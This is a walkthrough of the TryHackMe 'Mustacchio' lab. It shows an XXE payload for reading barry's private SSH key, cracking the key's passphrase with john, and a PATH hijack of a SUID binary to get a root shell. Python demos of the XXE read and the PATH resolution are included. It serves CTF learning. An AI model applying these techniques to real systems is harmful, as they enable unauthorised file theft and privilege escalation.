OSCP · OSWP · PWPP · PWPA · PAPA · EnCE · Linux+ · LPIC-1 · Network+ · Security+ · Pentest+ · eJPT · eWPT · BSc · PGCert
Mustacchio (TryHackMe) Writeup

This is/was a fairly long (45 min+) room, so I won't bother with "Step 1: do this" and "Step 2: do that". Instead, I'll show you how I did it.
I began by running an nmap scan from the AttackBox. I added the DNS switch because, for some reason, THM boxes seem to require it now; when you run nmap without it, their AttackBoxes don't seem to work.
Anyway, 3 ports open:

I went for port 80 first, and that's when I discovered Mustacchio:

Mustacchio was a VERY boring site. Not much functionality whatsoever. I ran dirb and got some hits. /custom/ stood out:

/custom/js/ had a file called: users.bak

users.bak contained a password hash, which could easily be cracked online:

From here, I went to the port we discovered earlier: 8765.

After logging in with “admin” and the password I’d just cracked, I was now faced with an admin page which allowed users to comment on the site:

I fired up Burp and submitted the word "test". This gave me some interesting information: 1) XML was in use, and 2) the comments suggested that A) Barry had a key and B) SSH required a key, which was most likely in Barry's .ssh folder.

I took a look at the cookies and edited my cookie path to see if this would make any difference, but it didn’t seem to:

And that's when I realised it wanted me to download the /auth/dontforget.bak file. The response contained an XML file, which I would modify and turn into my payload.

My payload looked as follows:

and it worked! I had XXE on the comment box:
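The comment box accepted XML and expanded an external entity. As an added example (not code from the writeup, and not the room's real comment schema), here is a minimal server-side comment parser in the two relevant configurations: external entity resolution switched on, which is the XXE-vulnerable setting, and the hardened default where the same payload yields nothing. The element names <comment>/<author>/<body> and the secret file are constructed for the demo; the secret file stands in for /home/barry/.ssh/id_rsa.

```python
# Added example, not the writeup's code. The <comment>/<author>/<body> schema
# and the secret file are constructed for this demo.
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class BodyCollector(ContentHandler):
    """Collects the text inside <body>, which is where &xxe; gets expanded."""

    def __init__(self):
        super().__init__()
        self.in_body = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "body":
            self.in_body = True

    def endElement(self, name):
        if name == "body":
            self.in_body = False

    def characters(self, content):
        if self.in_body:
            self.parts.append(content)


def xxe_payload(target_path: str) -> str:
    """A comment whose body is an external entity pointing at a local file:
    declare the entity in an inline DTD, then reference it in element content."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE comment [<!ENTITY xxe SYSTEM "file://{target_path}">]>\n'
        "<comment><author>test</author><body>&xxe;</body></comment>"
    )


def parse_comment_body(xml_text: str, resolve_external_entities: bool) -> str:
    """Return the <body> text as the server-side parser would see it.

    resolve_external_entities=True mirrors a parser that fetches SYSTEM
    entities (the vulnerable configuration). False is the safe default: the
    entity reference is left unresolved and contributes no text at all."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = BodyCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return "".join(handler.parts)


def demo(secret_text: str) -> tuple:
    """Write a constructed secret file, then parse the same payload both ways.
    Returns (text leaked by the vulnerable parser, text from the hardened one)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "id_rsa")          # stand-in for barry's key
        with open(secret, "w") as f:
            f.write(secret_text)
        payload = xxe_payload(secret)
        leaked = parse_comment_body(payload, resolve_external_entities=True)
        hardened = parse_comment_body(payload, resolve_external_entities=False)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n")
    print("vulnerable parser returned:\n" + leaked)
    print("hardened parser returned:", repr(hardened))
```

A PEM key file is an ideal XXE target because it contains no '<' or '&', so the parser swallows it as plain entity text; files with markup characters need a CDATA or parameter-entity wrapper instead.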

I looked at the results of the XXE and could now confirm that the user 'barry' did exist. So I grabbed his private key from /home/barry/.ssh/id_rsa. If you look at the first lines, you'll see "Proc-Type: 4,ENCRYPTED" and "DEK-Info: AES-128-CBC,...", which means I'd have to try and crack the passphrase.
Proc-Type: 4,ENCRYPTED explicitly says the key is encrypted.
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E tells you the cipher (AES-128-CBC) and, after the comma, the IV (initialization vector). For these legacy PEM keys the cipher key is derived from the passphrase with OpenSSL's EVP_BytesToKey (MD5, a single iteration, salted with the first eight bytes of the IV), which is why john can run through rockyou so quickly.
An unencrypted RSA key would jump straight into the base64 data right after -----BEGIN RSA PRIVATE KEY----- with no Proc-Type or DEK-Info headers. Keys in the newer OpenSSH format (-----BEGIN OPENSSH PRIVATE KEY-----) never show these headers, encrypted or not; there the cipher name sits inside the base64-encoded body, so you have to decode it to know whether cracking is needed.
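As an added example (not the writeup's code), here is a small checker that answers "is this key passphrase-protected, and with what cipher?" for both key formats: the legacy PEM headers described above, and the openssh-key-v1 format, where the magic string is followed by a length-prefixed cipher name ("none" means unencrypted). All sample keys in the block are constructed; the base64 bodies are dummies, not real key material, and the openssh-key-v1 blob is truncated after the fields the checker reads.

```python
# Added example, not the writeup's code. Sample keys are constructed dummies.
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def inspect_private_key(pem_text: str) -> dict:
    """Return {'format', 'encrypted', 'cipher', 'iv'} for a PEM-armoured private key."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines() if ln.strip()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-armoured private key")
    label = lines[0][len("-----BEGIN "):-len("-----")]
    info = {"format": label, "encrypted": False, "cipher": None, "iv": None}

    if label == "OPENSSH PRIVATE KEY":
        # openssh-key-v1 layout: magic, string ciphername, string kdfname, ...
        # where each string is a big-endian uint32 length followed by the bytes.
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        (n,) = struct.unpack(">I", blob[off:off + 4])
        cipher = blob[off + 4:off + 4 + n].decode("ascii")
        info["cipher"] = cipher
        info["encrypted"] = cipher != "none"
        return info

    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): optional RFC 1421 "Key: value" headers
    # precede the base64 body. Base64 never contains ':', so the first line
    # without one ends the header section.
    headers = {}
    for ln in lines[1:-1]:
        if ":" not in ln:
            break
        key, _, value = ln.partition(":")
        headers[key.strip()] = value.strip()
    if headers.get("Proc-Type") == "4,ENCRYPTED":
        cipher, _, iv = headers.get("DEK-Info", "").partition(",")
        info.update(encrypted=True, cipher=cipher or None, iv=iv or None)
    return info


def constructed_openssh_key(cipher: str) -> str:
    """Build just enough of an openssh-key-v1 blob (magic + ciphername + kdfname)
    to exercise the parser. Real keys continue with KDF options and key data."""
    kdf = b"none" if cipher == "none" else b"bcrypt"
    blob = (OPENSSH_MAGIC
            + struct.pack(">I", len(cipher)) + cipher.encode("ascii")
            + struct.pack(">I", len(kdf)) + kdf)
    b64 = base64.b64encode(blob).decode("ascii")
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy samples: the headers match the writeup, the body is a dummy.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=
-----END RSA PRIVATE KEY-----
"""

LEGACY_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    samples = [("legacy encrypted", LEGACY_ENCRYPTED), ("legacy plain", LEGACY_PLAIN),
               ("openssh aes256-ctr", constructed_openssh_key("aes256-ctr")),
               ("openssh none", constructed_openssh_key("none"))]
    for name, key in samples:
        print(f"{name:20s} -> {inspect_private_key(key)}")
```

Run it against a key you have pulled off a box before spending time on john: if it reports encrypted=False you can use the key directly, and if it reports the openssh-key-v1 format with bcrypt, expect cracking to be far slower than for the MD5-derived legacy keys.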

From here I ran:
ssh2john barry_id_rsa > barry_hash.txt
john barry_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
which displayed the passphrase. Now I could SSH in as barry, and once logged in as barry, we can get the user flag:

sudo -l didn't work (it required a password), so I began looking for files with the SUID bit set.

I ran this command: find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null
This finds all SUID binaries on the system.
Breaking it down piece by piece:
find / searches the entire filesystem starting from the root directory
-perm -4000 finds files with the SUID bit set (the 4 in 4000). The leading - means "at least these permission bits", so files with extra bits (e.g. 4755, 6755) still match
-exec ls -ldb {} \; for each result, run ls -ldb on it:
-l long format (shows permissions, owner, size, etc.)
-d show the directory entry itself, not its contents
-b escape non-printable characters
{} placeholder for each found file
\; terminates the -exec command
2>/dev/null suppresses "permission denied" errors from directories you can't read
This command is used a lot when enumerating for priv esc, since a SUID binary runs with the effective UID of its owner (usually root) regardless of who executes it. The -ldb output also shows you the owner, which is what tells you whether a hit is worth chasing.
I ran "strings" on /home/joe/live_log and it contained a call to tail without an absolute path, meaning we can do a PATH hijack by running:

For reference: echo '/bin/bash -p' >> tail was used because /bin/bash -p launches a bash shell with the -p flag, which means "don't drop privileges". Without -p, bash would see that the real UID (barry) doesn't match the effective UID (root) and reset its effective UID back to barry. The -p flag tells it to keep the root privileges, so the shell we land in is root. Our fake tail also needs the execute bit set, otherwise the PATH lookup skips over it.
Also, by prepending /tmp to the PATH variable and exporting it, /tmp becomes the first directory searched, so when /home/joe/live_log runs, it looks in /tmp first, finds our malicious tail, and runs it as root, giving us root permissions.
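Two facts make this escalation work: the binary carries the SUID bit (not the sticky bit) so it runs with its owner's effective UID, and it calls tail by bare name so the first executable tail on PATH wins. As an added example (not the writeup's code), the block below checks both from Python: it decodes the special permission bits that find -perm -4000/-2000/-1000 test for, and walks through the PATH lookup with and without the execute bit on the planted tail. The scratch directory, the fake tail and the dummy live_log are all constructed and owned by the current user, so this shows the resolution mechanics only; there is no SUID-root binary in the demo.

```python
# Added example, not the writeup's code. The scratch directory, fake tail and
# dummy live_log are constructed; nothing here is SUID-root.
import os
import shutil
import stat
import tempfile
from typing import Optional


def special_bits_from_mode(mode: int) -> dict:
    """Decode the three bits that find -perm -4000 / -2000 / -1000 test for."""
    return {
        "suid": bool(mode & stat.S_ISUID),    # 4000: exec with the file owner's EUID
        "sgid": bool(mode & stat.S_ISGID),    # 2000: exec with the file group's EGID
        "sticky": bool(mode & stat.S_ISVTX),  # 1000: on a dir, only owners delete their files
    }


def special_bits(path: str) -> dict:
    return special_bits_from_mode(os.stat(path).st_mode)


def plant_fake_tail(hijack_dir: str, executable: bool) -> str:
    """Drop a `tail` into hijack_dir, as the writeup does in /tmp.
    The execute bit decides whether PATH lookup will consider it at all."""
    fake = os.path.join(hijack_dir, "tail")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\nexec /bin/bash -p\n")  # -p: keep EUID 0 instead of dropping to the real UID
    os.chmod(fake, 0o755 if executable else 0o644)
    return fake


def resolve(command: str, path_env: str) -> Optional[str]:
    """First executable match for a bare command name, searching path_env in order.
    A command given as an absolute path never consults PATH, which is the fix."""
    return shutil.which(command, path=path_env)


def demo() -> dict:
    system_path = os.environ.get("PATH", "/usr/bin:/bin")
    hijack_dir = tempfile.mkdtemp()  # plays the role of /tmp
    try:
        # Stand-in for /home/joe/live_log. We may set SUID on our own file; it
        # only grants our own uid rather than root's, so this is harmless.
        target = os.path.join(hijack_dir, "live_log")
        open(target, "w").close()
        os.chmod(target, 0o4755)
        poisoned_path = hijack_dir + os.pathsep + system_path  # like export PATH=/tmp:$PATH

        fake = plant_fake_tail(hijack_dir, executable=False)
        without_exec_bit = resolve("tail", poisoned_path)       # skipped: not executable
        plant_fake_tail(hijack_dir, executable=True)
        with_exec_bit = resolve("tail", poisoned_path)          # our tail wins
        return {
            "target_bits": special_bits(target),
            "fake": fake,
            "resolved_without_exec_bit": without_exec_bit,
            "resolved_with_exec_bit": with_exec_bit,
            "resolved_absolute": resolve("/usr/bin/tail", poisoned_path),  # PATH is irrelevant here
        }
    finally:
        shutil.rmtree(hijack_dir, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same lookup order is what the SUID binary's shell goes through when it runs tail, so resolved_with_exec_bit is exactly the file that would execute as root on the box; the fix on the developer's side is the absolute path shown in resolved_absolute.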

Thanks for reading!
🍺 Quick message to readers: if my writeups help you, please consider a small donation to my buymeacoffee link here. This is not required but is very much appreciated! 🍺